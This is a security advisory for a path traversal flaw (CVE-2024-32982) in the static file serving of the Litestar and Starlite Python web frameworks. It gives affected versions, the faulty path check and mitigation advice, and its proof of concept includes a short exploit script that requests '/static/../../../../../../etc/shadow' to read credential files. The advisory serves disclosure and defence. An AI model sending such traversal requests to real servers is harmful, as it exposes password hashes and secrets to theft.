Skip to content

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in Litestar and Starlite

High
peterschutt published GHSA-83pv-qr33-2vcf May 6, 2024

Package

pip litestar (pip)

Affected versions

>=2.0.0;<= 2.8.2

Patched versions

2.8.3 2.7.2 2.6.4
pip starlite (pip)
>=1.37.0;<=1.51.15
1.51.16

Description

Summary

Local File Inclusion via Path Traversal in LiteStar Static File Serving

A Local File Inclusion (LFI) vulnerability has been discovered in the static file serving component of LiteStar. This vulnerability allows attackers to exploit path traversal flaws, enabling unauthorized access to sensitive files outside the designated directories. Such access can lead to the disclosure of sensitive information or potentially compromise the server.

Details

The vulnerability is located in the file path handling mechanism within the static content serving function, specifically at line 70 in litestar/static_files/base.py.

The function fails to properly validate the destination file path derived from user input, thereby permitting directory traversal. The critical code segment is as follows:

commonpath([str(directory), file_info["name"], joined_path])

Given the variables:

directory = PosixPath('/Users/brian/sandbox/test_vuln/static')
file_info["name"] = '/Users/brian/sandbox/test_vuln/static/../requirements.txt'
joined_path = PosixPath('/Users/brian/sandbox/test_vuln/static/../requirements.txt')

The function outputs '/Users/brian/sandbox/test_vuln/static', incorrectly assuming it is confined to the static directory. This incorrect validation facilitates directory traversal, exposing the system to potential unauthorized access and manipulation.

Proof of Concept (PoC)

To reproduce this vulnerability, follow these steps:

  1. Set up the environment:

    • Install with pip the uvicorn and litestar packages.
    • Create a static folder in the root directory of your project and place any file (e.g., an image) in it for testing.
    • Ensure the static file serving is enabled, which is typically the default configuration.
  2. Preparation of the testing environment:

    • If using Ubuntu or a similar system, you can use /etc/shadow which contains sensitive password information. If not, create a dummy sensitive file outside the static directory for testing.
    • Create a main.py file with the following content to configure and run the LiteStar server:
    from pathlib import Path
    from litestar import Litestar
    from litestar.static_files import create_static_files_router
    import uvicorn
    
    app = Litestar(
        route_handlers=[
            create_static_files_router(path="/static", directories=["static"]),
        ],
    )
    
    if __name__ == "__main__":
        uvicorn.run("main:app", host="0.0.0.0", port=8000)
    • Run this script with the command python3 main.py to start the server.
  3. Exploit:

    • Prepare an exploit script named exploit.py with the following Python code to perform the HTTP request without client-side sanitization:
    import http.client
    
    def send_request(host, port, path):
        connection = http.client.HTTPConnection(host, port)
        connection.request("GET", path)
        response = connection.getresponse()
        print(f"Status: {response.status}")
        print(f"Headers: {response.getheaders()}")
        data = response.read()
        print(f"Body: {data.decode('utf-8')}")
        connection.close()
    
    send_request("localhost", 8000, "/static/../../../../../../etc/shadow")
    • Execute this script using python3 exploit.py. This script uses direct HTTP connections to bypass client-side path sanitization present in tools like curl or web browsers.
  4. Observe:

    • The server should respond with the contents of the /etc/shadow file, thereby confirming the path traversal vulnerability.
    • The output will display the status, headers, and body of the response, which should contain the contents of the sensitive file.

Impact

This Local File Inclusion vulnerability critically affects all instances of LiteStar where the server has been configured to serve static files. By exploiting this vulnerability, unauthorized attackers can gain read access to any file that the server process has permission to access. Here are the specific impacts:

  1. Exposure of Sensitive Information:

    • The ability to traverse the file system can lead to the exposure of highly sensitive information. This includes system configuration files, application logs, or scripts containing credentials or cryptographic keys. Such information can provide attackers with deeper insights into the system architecture or facilitate further attacks.
  2. Potential for System Compromise:

    • If sensitive system or application configuration files are exposed, attackers might be able to use this information to manipulate system behavior or escalate their privileges. For instance, accessing a .env file might reveal environment variables used for application configurations that include database passwords or API keys.
  3. Credential Leakage:

    • Access to files such as /etc/passwd or /etc/shadow (on Unix-like systems) could expose user credentials, which might be leveraged to perform further attacks, such as brute force attacks on user accounts or using stolen credentials to access other systems where the same credentials are reused.
  4. Regulatory and Compliance Violations:

    • Unauthorized access to personally identifiable information (PII), payment data, or health records could result in breaches of data protection regulations such as GDPR, HIPAA, or PCI DSS. This could not only damage the reputation of the organization but also lead to heavy fines and legal action.
  5. Loss of Trust and Reputation Damage:

    • Security incidents, particularly those involving the loss of sensitive data, can significantly damage an organization's reputation. Customers and partners may lose trust, which can impact the business both immediately and in the long term.
  6. Potential for Further Exploitation:

    • The initial read access gained through this vulnerability might be used as a stepping stone for more severe attacks. For example, if application source code is accessed, it could be analyzed for further vulnerabilities that might lead to direct exploitation, such as remote code execution.

Here's the revised Mitigation Suggestion section for your vulnerability report, focusing on items 1 and 2, and including a reference to a similar implementation in another project:

Mitigation Suggestion

To effectively address the Local File Inclusion vulnerability via path traversal identified in the LiteStar application, it is essential to implement robust input validation and sanitization mechanisms. Below are specific strategies focused on managing user inputs and ensuring secure file path handling:

  1. Input Validation and Sanitization:

    • Implement rigorous validation of all user-supplied input, particularly file path inputs. This should include sanitizing the input to remove or neutralize potentially harmful characters and sequences such as ../ which are used in path traversal attacks.
    • Use regular expressions to validate file paths against a strict pattern that only matches expected and safe input.
  2. Path Normalization:

    • Normalize file paths before using them in file operations. Functions such as os.path.normpath() in Python can be used to normalize paths. This method resolves redundant separators and up-level references (../) to prevent directory traversal.
    • As a reference, consider the approach taken by the Starlette framework in their static file serving feature, where path validation is performed to ensure the requested path remains within the intended directory. For example, see how Starlette handles this with a security check:
      if os.path.commonpath([full_path, directory]) != directory:
          # Don't allow misbehaving clients to break out of the static files
          # directory.
          continue
      This snippet from Starlette's implementation ensures that the constructed file path does not traverse out of the specified directory.

Comments

Naming Convention:

  • From versions 0.X.X through 1.X.X, the package was released under the name "starlite."
  • Starting with version 2.0.0 and for all subsequent versions, the package has been rebranded and released under the name "litestar."

Feature Additions and Changes:

  • Static Files Support: Introduced in version 0.6.0, adding the capability to serve static files directly from the package.
  • Path Validation Update: In version 1.37.0, Starlite modified its approach to validating paths within the static directory. Prior to this version, path validation was managed using the Starlette framework.

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
Low
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

CVE ID

CVE-2024-32982

Weaknesses

Credits